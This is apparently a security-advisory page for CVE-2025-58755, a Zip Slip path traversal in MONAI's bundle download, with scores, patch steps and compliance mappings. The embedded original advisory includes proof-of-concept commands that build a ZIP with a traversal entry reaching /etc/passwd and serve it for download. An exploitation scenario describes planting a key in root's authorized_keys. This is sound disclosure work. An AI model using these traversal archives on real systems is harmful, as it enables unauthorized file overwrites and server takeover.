AI Threat Alert

CVE-2025-58755: MONAI: path traversal allows arbitrary file write

GHSA-x6ww-pf9m-m73m HIGH PoC AVAILABLE
Published September 9, 2025
CISO Take

MONAI bundle downloads are vulnerable to Zip Slip — a malicious ZIP hosted anywhere online can overwrite system files on ML workstations or training servers when extracted. Update to MONAI 1.5.1 immediately. Audit any system where untrusted URLs were passed to MONAI's bundle download function.

What is the risk?

High risk for AI/ML teams using MONAI bundle downloads. CVSS 8.8 with network vector, low complexity, and low privileges required. Attack surface is broad: MONAI is prevalent in medical imaging AI pipelines and researchers routinely pull bundles from community sources like HuggingFace, GitHub, and MONAI Hub. An attacker who can host a ZIP (or MITM a download) achieves arbitrary file write without meaningful user interaction beyond the normal bundle workflow. Containerized training environments frequently run as root, amplifying impact.

What systems are affected?

Package Ecosystem Vulnerable Range Patched
MONAI pip <= 1.5.0 1.5.1
8.3K OpenSSF 6.7 110 dependents Pushed 8d ago 100% patched ~15d to patch Full package profile →

Do you use MONAI? You're affected.

How severe is it?

CVSS 3.1
8.8 / 10
EPSS
0.6%
chance of exploitation in 30 days
Higher than 42% of all CVEs
Source: EPSS v3 — FIRST.org
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV AC PR UI S C I A
AV Network
AC Low
PR Low
UI None
S Unchanged
C High
I High
A High

What should I do?

5 steps

  1. PATCH

    Upgrade to monai >= 1.5.1 immediately (pip install --upgrade monai).

  2. AUDIT

    Run pip freeze | grep monai across all ML training and inference systems.

  3. DETECT

    Review file system audit logs for unexpected writes outside bundle extraction directories during MONAI operations.

  4. WORKAROUND (if immediate patch is blocked): Restrict bundle downloads to MONAI's official hosting only; never pass untrusted or user-supplied URLs to monai.bundle.scripts.download.

  5. HARDEN

    Run MONAI processes as non-root in containers with restricted filesystem mounts; apply seccomp/AppArmor profiles to training containers.

What does CISA's SSVC say?

Decision Track
Exploitation none
Automatable No
Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Supply Chain Code Execution Framework AML.T0002.001 AML.T0010.001 AML.T0011.000 AML.T0049

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Art. 9 - Risk management system
ISO 42001
A.6.1.4 - AI supply chain management
NIST AI RMF
MANAGE 2.2 - Prioritize and apply risk treatments for AI risks
OWASP LLM Top 10
LLM03 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2025-58755?

MONAI bundle downloads are vulnerable to Zip Slip — a malicious ZIP hosted anywhere online can overwrite system files on ML workstations or training servers when extracted. Update to MONAI 1.5.1 immediately. Audit any system where untrusted URLs were passed to MONAI's bundle download function.

Is CVE-2025-58755 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2025-58755, increasing the risk of exploitation.

How to fix CVE-2025-58755?

1. PATCH: Upgrade to monai >= 1.5.1 immediately (`pip install --upgrade monai`). 2. AUDIT: Run `pip freeze | grep monai` across all ML training and inference systems. 3. DETECT: Review file system audit logs for unexpected writes outside bundle extraction directories during MONAI operations. 4. WORKAROUND (if immediate patch is blocked): Restrict bundle downloads to MONAI's official hosting only; never pass untrusted or user-supplied URLs to monai.bundle.scripts.download. 5. HARDEN: Run MONAI processes as non-root in containers with restricted filesystem mounts; apply seccomp/AppArmor profiles to training containers.

What systems are affected by CVE-2025-58755?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, model serving, MLOps/CI pipelines.

What is the CVSS score for CVE-2025-58755?

CVE-2025-58755 has a CVSS v3.1 base score of 8.8 (HIGH). The EPSS exploitation probability is 0.57%.

What is the AI security impact?

Affected AI Architectures

training pipelinesmodel servingMLOps/CI pipelines

MITRE ATLAS Techniques

AML.T0002.001 Models
AML.T0010.001 AI Software
AML.T0011.000 Unsafe AI Artifacts
AML.T0049 Exploit Public-Facing Application

Compliance Controls Affected

EU AI Act: Art. 9
ISO 42001: A.6.1.4
NIST AI RMF: MANAGE 2.2
OWASP LLM Top 10: LLM03

What are the technical details?

Original Advisory

### Summary The extractall function ```zip_file.extractall(output_dir)``` is used directly to process compressed files. It is used in many places in the project. When the Zip file containing malicious content is decompressed, it will overwrite the system files. In addition, the project allows the download of the zip content through the link, which increases the scope of exploitation of this vulnerability. When reproducing locally, follow the process below to create a malicious zip file and simulate the process of remotely downloading the zip file. ``` root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# mkdir -p test_bundle root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# echo "malicious content" > test_bundle/malicious.txt root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# cd test_bundle root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm/test_bundle# zip -r ../malicious.zip . ../../../../../../etc/passwd adding: malicious.txt (stored 0%) adding: ../../../../../../etc/passwd (deflated 64%) root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm/test_bundle# cd .. root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# ls malicious.zip p1.py p2.py r1.py test_bundle ``` Then start the http service through python ``` root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# python -m http.server 8000 Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... ``` Another terminal simulates a normal user downloading zip content from the Internet, perhaps from some popular forums or blogs, such as huggingface, etc. ``` root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# python -c "from monai.bundle.scripts import download; download(name='test_bundle', url='http://localhost:8000/malicious.zip', bundle_dir='/tmp/test_extract')" 2025-08-11 20:49:01,668 - INFO - --- input summary of monai.bundle.scripts.download --- 2025-08-11 20:49:01,668 - INFO - > name: 'test_bundle' 2025-08-11 20:49:01,668 - INFO - > bundle_dir: '/tmp/test_extract' 2025-08-11 20:49:01,668 - INFO - > source: 'monaihosting' 2025-08-11 20:49:01,668 - INFO - > url: 'http://localhost:8000/malicious.zip' 2025-08-11 20:49:01,668 - INFO - > remove_prefix: 'monai_' 2025-08-11 20:49:01,668 - INFO - > progress: True 2025-08-11 20:49:01,668 - INFO - --- test_bundle.zip: 8.00kB [00:00, 204kB/s] 2025-08-11 20:49:01,710 - INFO - Downloaded: /tmp/test_extract/test_bundle.zip 2025-08-11 20:49:01,710 - INFO - Expected md5 is None, skip md5 check for file /tmp/test_extract/test_bundle.zip. 2025-08-11 20:49:01,710 - INFO - Writing into directory: /tmp/test_extract. 2025-08-11 20:49:01,711 - WARNING - metadata file not found in /tmp/test_extract/test_bundle/configs/metadata.json. root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# ls / autodl-pub cuda-keyring_1.0-1_all.deb home lib32 **malicious.txt** opt run sys var bin dev init lib64 media proc sbin tmp boot etc lib libx32 mnt root srv usr ``` We can see that malicious.txt was indeed extracted to the root directory, demonstrating that the path traversal successfully wrote the malicious file. If the Zip file contains SSH keys, malicious content that automatically loads when the user boots the computer, or overwrites legitimate user files, causing services to become inoperable, these actions could cause extremely serious damage. ### Impact Arbitrary file write ### Repair Suggestions Check the contents of the downloaded Zip file, or use a safer method to load it

Exploitation Scenario

Attacker uploads a crafted ZIP to HuggingFace, a research Slack channel, or a community forum frequented by medical AI teams. The ZIP contains an entry with a traversal path (e.g., `../../../../../root/.ssh/authorized_keys`) populated with the attacker's public key. An ML engineer follows a tutorial or colleague recommendation and runs `monai.bundle.scripts.download(url='<attacker-url>', bundle_dir='/tmp/model')`. MONAI downloads and calls `extractall()` without path sanitization, writing the attacker's key into root's authorized_keys. The attacker gains SSH access to a GPU training server, potentially with access to patient imaging datasets and downstream clinical AI model artifacts.

Weaknesses (CWE)

CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Primary

CWE-22 — Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'): The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.

  • [Implementation] Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylis
  • [Architecture and Design] For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

References

Timeline

Published
September 9, 2025
Last Modified
September 26, 2025
First Seen
March 24, 2026

Related Vulnerabilities

HIGH CVE-2025-58757 8.8

MONAI: unsafe pickle deserialization RCE in data pipeline

Same package: monai
HIGH CVE-2025-58756 8.8

MONAI: unsafe deserialization in CheckpointLoader allows RCE

Same package: monai
HIGH GHSA-89gg-p5r5-q6r4 7.7

MONAI: pickle deserialization RCE in Auto3DSeg

Same package: monai
MEDIUM CVE-2026-21851 5.3

monai: Path Traversal enables file access

Same package: monai
CRITICAL CVE-2024-2912 10.0

BentoML: RCE via insecure deserialization (CVSS 10)

Same attack type: Supply Chain
Back to Threat Feed